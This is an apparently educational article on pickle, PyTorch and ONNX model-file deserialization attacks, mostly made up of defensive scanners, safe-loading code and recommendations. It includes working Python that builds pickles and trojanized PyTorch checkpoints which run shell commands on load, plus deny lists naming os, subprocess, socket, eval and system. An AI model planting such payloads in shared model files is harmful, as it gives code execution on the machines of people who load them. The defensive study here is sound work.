Model Serialization Attacks
Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.
Overview
Model serialization, the process of saving trained model weights and architecture to disk, is one of the most dangerous attack surfaces in the ML ecosystem. The dominant serialization format for PyTorch models uses Python's pickle module, which is fundamentally unsafe: loading a pickle file can execute arbitrary Python code. Downloading and loading a model from an untrusted source is therefore equivalent to downloading and running an executable from that source.
This vulnerability is not theoretical. Researchers have repeatedly demonstrated malicious model files on the Hugging Face Hub and other model repositories. The attack surface is broad because loading models is so routine: data scientists and ML engineers regularly download pretrained models and fine-tuned checkpoints, often with minimal verification. The widespread culture of sharing models through platforms such as Hugging Face has normalized a practice that traditional software engineering would consider reckless.
This article covers the mechanics of serialization attacks across several formats (pickle, ONNX, TensorRT), demonstrates how malicious model files are created and detected, and presents safe loading practices. The attacks map to MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and are covered by OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).
Python Pickle: The Fundamental Vulnerability
How Pickle Works
Python's pickle module serializes Python objects by recording the instructions needed to reconstruct them. During unpickling, a small stack-based virtual machine executes these instructions. The critical security problem is that pickle's instruction set includes the REDUCE opcode, which calls an arbitrary callable with arbitrary arguments. This is by design, because pickle has to reconstruct complex objects, but it means a crafted pickle file can call os.system, subprocess.Popen, or any other importable Python function.
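A harmless way to see REDUCE at work is to pickle an object whose `__reduce__` names a benign callable and then disassemble the result. This is a minimal sketch: the class `Benign` and the helper `opcode_names` are made up for illustration, and `len` stands in for whatever callable an attacker would choose.

```python
import pickle
import pickletools


class Benign:
    """Hypothetical class whose __reduce__ names a harmless callable."""

    def __reduce__(self):
        # On load, the unpickler will call len("loaded")
        return (len, ("loaded",))


def opcode_names(payload: bytes) -> list:
    """List the opcode names in a pickle stream without executing it."""
    return [opcode.name for opcode, _arg, _pos in pickletools.genops(payload)]


payload = pickle.dumps(Benign())
names = opcode_names(payload)

# The stream does not describe a Benign object at all. It only records:
# resolve a callable, push its arguments, REDUCE.
print("REDUCE" in names)
print(b"Benign" in payload)

# Loading calls len("loaded") and returns its result, not a Benign instance.
result = pickle.loads(payload)
print(result)
```

Swapping `len` for `os.system` is the whole attack: nothing in the file format distinguishes the two.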
```python
import os
import pickle


class PickleExploit:
    """
    Demonstrate how pickle deserialization enables code execution.
    FOR EDUCATIONAL PURPOSES ONLY: use in controlled environments.
    """

    @staticmethod
    def create_malicious_pickle(command: str) -> bytes:
        """
        Create a pickle payload that executes a shell command on load.
        This demonstrates why pickle is fundamentally unsafe for untrusted data.
        """
        # The __reduce__ method tells pickle how to reconstruct the object.
        # By returning (os.system, (command,)), we instruct the unpickler
        # to call os.system(command) when loading.
        class Exploit:
            def __reduce__(self):
                return (os.system, (command,))

        return pickle.dumps(Exploit())

    @staticmethod
    def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
        """
        Create a payload that executes code AND returns legitimate-looking data.
        This is harder to detect because the model appears to load correctly.
        """
        class StealthExploit:
            def __init__(self, data):
                self.data = data

            def __reduce__(self):
                # eval() runs the command, then evaluates to the legitimate data.
                # `system(...) and None` is always falsy, so `or` yields the data.
                # !r quotes the command; the data must round-trip through repr().
                return (
                    eval,
                    (
                        f"__import__('os').system({command!r}) and None or {self.data!r}",
                    ),
                )

        return pickle.dumps(StealthExploit(legitimate_data))
```
PyTorch Model Files
PyTorch's torch.save() uses pickle by default. A malicious PyTorch model file (.pt, .pth, or .bin) can execute arbitrary code when it is loaded with torch.load() without weights_only=True, which only became the default in PyTorch 2.6:
```python
import os
from typing import Any, Dict

import torch
import torch.nn as nn


def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper called during deserialization: run the payload, return the data."""
    os.system(command)
    return state_dict


class MaliciousModelDemo:
    """
    Demonstrate malicious PyTorch model file creation.
    FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
    """

    @staticmethod
    def create_backdoored_model(
        legitimate_model: nn.Module,
        payload_command: str,
        output_path: str,
    ) -> None:
        """
        Save a model that executes a payload when loaded.
        The model functions normally after loading, so the payload is stealthy.

        Limitation of this demo: pickle stores the helper above by module
        path, so the payload only fires where that module is importable.
        """
        class TrojanizedState(dict):
            """A dict subclass that executes code when unpickled."""

            def __init__(self, state_dict: dict, command: str):
                super().__init__(state_dict)
                self._command = command

            def __reduce__(self):
                # When unpickled:
                # 1. Execute the payload
                # 2. Return a normal dict (so the model loads correctly)
                return (
                    _reconstruct_with_payload,
                    (dict(self), self._command),
                )

        state = TrojanizedState(legitimate_model.state_dict(), payload_command)
        torch.save(state, output_path)


class SafeModelLoader:
    """Load PyTorch models with safety checks."""

    @staticmethod
    def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict[str, Any]:
        """
        Load a checkpoint with weights_only=True (available since PyTorch 1.13,
        the default since PyTorch 2.6). The unpickler then accepts only tensors,
        primitive containers, and an allowlist of safe types.
        """
        try:
            state_dict = torch.load(
                path,
                map_location=map_location,
                weights_only=True,  # Critical security flag
            )
            return {"success": True, "state_dict": state_dict}
        except Exception as e:
            return {
                "success": False,
                "error": str(e),
                "detail": "Model file may contain non-tensor data (potential exploit)",
            }

    @staticmethod
    def scan_pickle_for_dangerous_ops(file_path: str) -> list:
        """
        Scan a pickle file for potentially dangerous operations
        WITHOUT executing them. Only the first pickle in each stream is
        disassembled, because pickletools.genops() stops at the first STOP.
        """
        import pickletools
        import zipfile
        from collections import deque

        findings = []
        dangerous_modules = {
            "os", "posix", "nt", "subprocess", "sys", "shutil", "builtins",
            "importlib", "ctypes", "socket", "http", "urllib",
            "requests", "pathlib", "tempfile", "webbrowser",
        }
        dangerous_functions = {
            "system", "popen", "exec", "eval", "execfile",
            "compile", "__import__", "getattr", "setattr",
            "globals", "locals", "open", "input",
        }
        string_ops = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

        try:
            # torch.save() writes a zip archive (PyTorch 1.6+); the pickle
            # stream is the member ending in ".pkl", typically data.pkl.
            if zipfile.is_zipfile(file_path):
                with zipfile.ZipFile(file_path) as zf:
                    streams = [zf.read(n) for n in zf.namelist() if n.endswith(".pkl")]
            else:
                with open(file_path, "rb") as f:
                    streams = [f.read()]

            for data in streams:
                recent = deque(maxlen=2)  # last two string operands seen
                reduce_count = 0
                # Use pickletools to disassemble without executing
                for opcode, arg, pos in pickletools.genops(data):
                    ref = None
                    if opcode.name in string_ops:
                        recent.append(arg)
                    elif opcode.name in ("GLOBAL", "INST") and isinstance(arg, str):
                        ref = arg  # genops reports "module name", space-separated
                    elif opcode.name == "STACK_GLOBAL" and len(recent) == 2:
                        # Protocol 4+: module and name are the two strings pushed
                        # just before. Heuristic: memoized strings are missed.
                        ref = " ".join(recent)
                    elif opcode.name == "REDUCE":
                        reduce_count += 1

                    if ref:
                        module, _, func = ref.partition(" ")
                        if (module.split(".")[0] in dangerous_modules
                                or func.split(".")[-1] in dangerous_functions):
                            findings.append({
                                "severity": "critical",
                                "position": pos,
                                "opcode": opcode.name,
                                "reference": ref,
                                "finding": f"Dangerous reference: {ref}",
                            })

                # REDUCE also appears in benign checkpoints, so report it once
                if reduce_count:
                    findings.append({
                        "severity": "medium",
                        "opcode": "REDUCE",
                        "count": reduce_count,
                        "finding": "REDUCE opcode found: triggers function calls during unpickling",
                    })
        except Exception as e:
            findings.append({
                "severity": "error",
                "finding": f"Failed to analyze pickle file: {e}",
            })
        return findings
```
SafeTensors: The Safe Alternative
SafeTensors is a serialization format developed by Hugging Face specifically to address the security problems of pickle. It stores only tensor data (shapes, dtypes, and raw numerical data) and has no mechanism for embedding executable code.
SafeTensors Architecture
The format is simple:
- An 8-byte header size (little-endian uint64)
- A JSON header describing tensor names, shapes, dtypes, and byte offsets
- Raw tensor data in contiguous byte arrays
There is no code, no object reconstruction, and no invocation of callables: only data.
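Because the layout is this small, the header can be inspected with the standard library alone. The following is a minimal sketch, not the official parser: `read_safetensors_header` and `write_demo_file` are hypothetical helpers, and the `max_header_bytes` cap is an assumption of this example.

```python
import json
import os
import struct
import tempfile
from typing import Any, Dict


def read_safetensors_header(path: str, max_header_bytes: int = 100_000_000) -> Dict[str, Any]:
    """Parse only the JSON header of a SafeTensors file; no tensor data is read."""
    with open(path, "rb") as f:
        prefix = f.read(8)
        if len(prefix) != 8:
            raise ValueError("file too short to contain a header length")
        (header_len,) = struct.unpack("<Q", prefix)  # little-endian uint64
        if header_len > max_header_bytes:
            raise ValueError(f"implausible header length: {header_len}")
        raw = f.read(header_len)
        if len(raw) != header_len:
            raise ValueError("truncated header")
    return json.loads(raw.decode("utf-8"))


def write_demo_file(path: str) -> None:
    """Write a one-tensor file by hand: a 2x2 float32 tensor of zeros."""
    header = {"weight": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]}}
    header_bytes = json.dumps(header).encode("utf-8")
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(header_bytes)))
        f.write(header_bytes)
        f.write(b"\x00" * 16)  # four float32 values


with tempfile.TemporaryDirectory() as tmp:
    demo_path = os.path.join(tmp, "demo.safetensors")
    write_demo_file(demo_path)
    header = read_safetensors_header(demo_path)

print(header["weight"])
```

Everything the reader does is bounded length checks and JSON parsing, which is why the format leaves no room for a REDUCE-style callable.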
```python
from pathlib import Path
from typing import Dict

import torch
from safetensors import safe_open
from safetensors.torch import save_file


class SafeTensorsManager:
    """Manage model weights using the SafeTensors format."""

    @staticmethod
    def convert_pytorch_to_safetensors(
        pytorch_path: str,
        safetensors_path: str,
    ) -> Dict:
        """Convert a PyTorch model file to SafeTensors format."""
        # Load with weights_only=True for safety during conversion
        state_dict = torch.load(
            pytorch_path, map_location="cpu", weights_only=True
        )
        # Ensure all values are tensors
        tensor_dict = {}
        for key, value in state_dict.items():
            if isinstance(value, torch.Tensor):
                # save_file() requires contiguous tensors; it also rejects
                # tensors that share memory (for example tied weights)
                tensor_dict[key] = value.contiguous()
            else:
                print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
        save_file(tensor_dict, safetensors_path)
        return {
            "input": pytorch_path,
            "output": safetensors_path,
            "tensors_saved": len(tensor_dict),
            "tensors_skipped": len(state_dict) - len(tensor_dict),
        }

    @staticmethod
    def verify_safetensors_integrity(file_path: str) -> Dict:
        """Verify a SafeTensors file's integrity and inspect its contents."""
        path = Path(file_path)
        result = {
            "file": file_path,
            "size_bytes": path.stat().st_size,
            "format_valid": False,
            "tensors": [],
        }
        try:
            with safe_open(file_path, framework="pt", device="cpu") as f:
                keys = list(f.keys())
                for key in keys:
                    tensor = f.get_tensor(key)
                    result["tensors"].append({
                        "name": key,
                        "shape": list(tensor.shape),
                        "dtype": str(tensor.dtype),
                    })
            result["format_valid"] = True
            result["tensor_count"] = len(keys)
        except Exception as e:
            result["error"] = str(e)
        return result
```
Limitations of SafeTensors
SafeTensors is not a complete model format: it stores only tensors, not the model architecture, optimizer state, or training configuration. This means:
- The model architecture must be defined in code; the SafeTensors file supplies only the weights
- Custom objects (learning-rate schedules, custom layers) cannot be serialized
- Some Hugging Face models still ship pickle files alongside SafeTensors for backward compatibility
ONNX Security Considerations
ONNX (Open Neural Network Exchange) is an open format for ML models that uses Protocol Buffers serialization. It is safer than pickle because loading parses data against a defined schema instead of executing arbitrary code. ONNX nevertheless has security concerns of its own:
Custom Operators
ONNX supports custom operators, whose implementations live in native shared libraries that the runtime loads and executes:
```python
import math
from pathlib import Path
from typing import Dict, List


class ONNXSecurityScanner:
    """Scan ONNX models for security issues."""

    # Heuristic threshold: dense weights need at most 8 bytes per element
    # (float64/int64). Tune this for your own models.
    MAX_BYTES_PER_ELEMENT = 16

    def scan_model(self, model_path: str) -> List[Dict]:
        """Scan an ONNX model for security concerns."""
        import onnx

        findings = []
        # Parse the graph only; do not read external-data files while scanning
        model = onnx.load(model_path, load_external_data=False)

        # Check for custom operators (could load arbitrary shared libraries)
        for node in model.graph.node:
            if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
                findings.append({
                    "severity": "high",
                    "finding": f"Custom operator domain: {node.domain}",
                    "operator": node.op_type,
                    "detail": "Custom operators may load arbitrary native code",
                })

        # Check for external data references
        for initializer in model.graph.initializer:
            if initializer.data_location == onnx.TensorProto.EXTERNAL:
                external_path = ""
                for entry in initializer.external_data:
                    if entry.key == "location":
                        external_path = entry.value
                # Absolute paths or ".." segments point outside the model directory
                location = Path(external_path)
                escapes = location.is_absolute() or ".." in location.parts
                findings.append({
                    "severity": "high" if escapes else "medium",
                    "finding": f"External data reference: {external_path}",
                    "detail": "External data could point to a malicious file path",
                })

        # Check model metadata for suspicious content
        for prop in model.metadata_props:
            if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
                findings.append({
                    "severity": "medium",
                    "finding": f"Suspicious metadata: {prop.key}",
                    "value_preview": prop.value[:100],
                })

        # Check file size against the number of tensor elements
        # (anomalously large files may contain embedded data)
        file_size = Path(model_path).stat().st_size
        element_count = sum(
            math.prod(initializer.dims)
            for initializer in model.graph.initializer
        )
        if element_count > 0:
            bytes_per_element = file_size / element_count
            if bytes_per_element > self.MAX_BYTES_PER_ELEMENT:
                findings.append({
                    "severity": "low",
                    "finding": f"Anomalous file size ratio: {bytes_per_element:.0f} bytes/element",
                    "detail": "Model file may contain embedded non-model data",
                })
        return findings
```
Model File Scanning Pipeline
Automated Scanning in CI/CD
Integrate model file scanning into the CI/CD stage of your ML pipeline:
```python
import hashlib
from datetime import datetime, timezone
from pathlib import Path
from typing import Dict

# SafeModelLoader is the class defined in the PyTorch section above.


class ModelFileScanner:
    """Comprehensive model file security scanner for CI/CD pipelines."""

    # No pickle involved, but not risk-free (see the ONNX section)
    SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
    UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}

    def __init__(self, policy: str = "strict"):
        """
        Args:
            policy: 'strict' blocks all unsafe formats,
                    'warn' records findings without blocking
        """
        self.policy = policy

    def scan_directory(self, directory: str) -> Dict:
        """Scan a directory of model files for security issues."""
        path = Path(directory)
        results = {
            "scan_time": datetime.now(timezone.utc).isoformat(),
            "directory": directory,
            "policy": self.policy,
            "files_scanned": 0,
            "findings": [],
            "blocked": [],
            "safe_files": [],
        }
        for file_path in path.rglob("*"):
            if not file_path.is_file():
                continue
            results["files_scanned"] += 1
            suffix = file_path.suffix.lower()
            if suffix in self.UNSAFE_FORMATS:
                finding = {
                    "file": str(file_path),
                    "format": suffix,
                    "severity": "high",
                    "finding": f"Unsafe serialization format: {suffix}",
                }
                # Deep scan pickle-based files
                if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
                    try:
                        pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
                            str(file_path)
                        )
                        if pickle_findings:
                            finding["pickle_analysis"] = pickle_findings
                        # Escalate only on a dangerous reference: benign
                        # checkpoints also contain REDUCE opcodes
                        if any(p.get("severity") == "critical" for p in pickle_findings):
                            finding["severity"] = "critical"
                    except Exception as e:
                        finding["scan_error"] = str(e)
                results["findings"].append(finding)
                if self.policy == "strict":
                    results["blocked"].append(str(file_path))
            elif suffix in self.SAFE_FORMATS:
                results["safe_files"].append(str(file_path))
        results["pass"] = len(results["blocked"]) == 0
        return results

    def generate_manifest(self, directory: str) -> Dict[str, str]:
        """Generate a hash manifest for all model files in a directory."""
        path = Path(directory)
        manifest = {}
        for file_path in sorted(path.rglob("*")):
            if file_path.is_file():
                sha256 = hashlib.sha256()
                with open(file_path, "rb") as f:
                    for chunk in iter(lambda: f.read(8192), b""):
                        sha256.update(chunk)
                relative = str(file_path.relative_to(path))
                manifest[relative] = sha256.hexdigest()
        return manifest
```
Scanning with Existing Tools
Several existing tools can scan model files for malicious content:
```bash
#!/bin/bash
# Model file security scanning pipeline
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
    echo "Usage: $0 <model_directory>"
    exit 1
fi

echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""

# Check for unsafe file formats (IFS= and -r keep odd filenames intact)
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while IFS= read -r f; do
    echo "  CRITICAL: Pickle file found: $f"
done
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while IFS= read -r f; do
    echo "  WARNING: PyTorch file (may use pickle): $f"
done
find "$MODEL_DIR" -type f -name "*.safetensors" | while IFS= read -r f; do
    echo "  OK: SafeTensors file: $f"
done

# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
    find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while IFS= read -r f; do
        echo "  Analyzing: $f"
        # A non-zero exit can mean an unsafe file or an unreadable one
        fickling --check-safety "$f" 2>/dev/null || echo "    fickling reported a problem with $f (unsafe or unreadable)"
    done
else
    echo "  fickling not installed. Install with: pip install fickling"
fi

# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
    modelscan scan -p "$MODEL_DIR"
else
    echo "  modelscan not installed. Install with: pip install modelscan"
fi

echo ""
echo "=== Scan Complete ==="
```
Both tools used above are real open-source projects:
- fickling (Trail of Bits): Static analysis of pickle files without executing them. https://github.com/trailofbits/fickling
- modelscan (Protect AI): Scans model files for unsafe operations across multiple formats. https://github.com/protectai/modelscan
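Static scanners are advisory: they flag a file but do not stop it from being loaded. Where a pickle still has to be loaded, the pickle documentation describes overriding `Unpickler.find_class` to allowlist globals, which is the same idea that weights_only=True applies to PyTorch checkpoints. The sketch below assumes a tiny allowlist; `ALLOWED_GLOBALS`, `AllowlistUnpickler`, `restricted_loads`, and `Probe` are names invented for this example.

```python
import io
import pickle
from collections import OrderedDict

# Assumption for this sketch: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but limited to ALLOWED_GLOBALS."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Probe:
    """Harmless stand-in for a malicious object: asks the loader to call len()."""

    def __reduce__(self):
        return (len, ("x",))


# An allowlisted container loads normally.
safe = pickle.dumps(OrderedDict(a=1))
print(restricted_loads(safe))

# Anything that needs a global outside the allowlist is rejected before it runs.
try:
    restricted_loads(pickle.dumps(Probe()))
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print(exc)
```

An allowlist fails closed: a callable nobody anticipated is rejected, whereas a denylist of dangerous names has to enumerate every one of them.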
Format Comparison
| Format | Code-execution risk | Ecosystem support | Performance | Recommended |
|---|---|---|---|---|
| Pickle (.pkl) | Critical: arbitrary code execution | Universal in Python | Fast | Never for untrusted sources |
| PyTorch (.pt/.pth) | High: uses pickle internally | PyTorch ecosystem | Fast | Use weights_only=True |
| SafeTensors | None: data only | Hugging Face, growing | Fast | Yes, the preferred format |
| ONNX (.onnx) | Low: custom ops can load code | Cross-framework | Good | Yes, with review of custom ops |
| TensorRT (.plan) | Low: engine format | NVIDIA inference | Fastest | Yes, for NVIDIA deployment |
| TFLite (.tflite) | Low: FlatBuffers format | Mobile/edge | Good | Yes, for edge deployment |
Defense Recommendations
- Use SafeTensors as the default serialization format for all new models
- Always pass weights_only=True when loading PyTorch models with torch.load()
- Scan all model files in CI/CD pipelines before deployment with fickling or modelscan
- Never load pickle files from untrusted sources; treat them as executables
- Convert existing pickle models to SafeTensors format and retire the pickle versions
- Verify model file hashes against a trusted manifest before loading
- Restrict model downloads to approved registries with verified publishers
- Monitor Hugging Face models for changes after upload (pin commit hashes, not branch refs)
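The hash-verification recommendation can be sketched with the standard library. This example assumes a manifest that maps relative paths to hex SHA-256 digests, the shape returned by generate_manifest earlier in this article; `sha256_file` and `verify_manifest` are hypothetical helper names.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large checkpoints do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(directory: str, manifest: Dict[str, str]) -> List[str]:
    """Return a list of problems; an empty list means every file matched."""
    root = Path(directory)
    problems = []
    for relative, expected in sorted(manifest.items()):
        target = root / relative
        if not target.is_file():
            problems.append(f"missing: {relative}")
        elif sha256_file(target) != expected.lower():
            problems.append(f"hash mismatch: {relative}")
    # Files that are present but not listed are suspicious too.
    for file_path in sorted(root.rglob("*")):
        relative = str(file_path.relative_to(root))
        if file_path.is_file() and relative not in manifest:
            problems.append(f"unlisted file: {relative}")
    return problems


with tempfile.TemporaryDirectory() as tmp:
    model_file = Path(tmp) / "model.safetensors"
    model_file.write_bytes(b"original weights")
    manifest = {"model.safetensors": sha256_file(model_file)}

    clean = verify_manifest(tmp, manifest)

    # Simulate a file that was swapped after the manifest was recorded.
    model_file.write_bytes(b"tampered weights")
    tampered = verify_manifest(tmp, manifest)

print(clean)
print(tampered)
```

The check is only as trustworthy as the manifest, so the manifest should be stored and delivered separately from the model files it describes.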
References
- Trail of Bits fickling: https://github.com/trailofbits/fickling (static analysis for pickle files)
- Protect AI modelscan: https://github.com/protectai/modelscan (multi-format model file scanner)
- Hugging Face SafeTensors: https://github.com/huggingface/safetensors
- MITRE ATLAS: AML.T0010 (ML Supply Chain Compromise)
- OWASP LLM Top 10 2025: LLM04 (Data and Model Poisoning)
- Python pickle documentation: https://docs.python.org/3/library/pickle.html (see the security warnings)
- PyTorch weights_only documentation: https://pytorch.org/docs/stable/generated/torch.load.html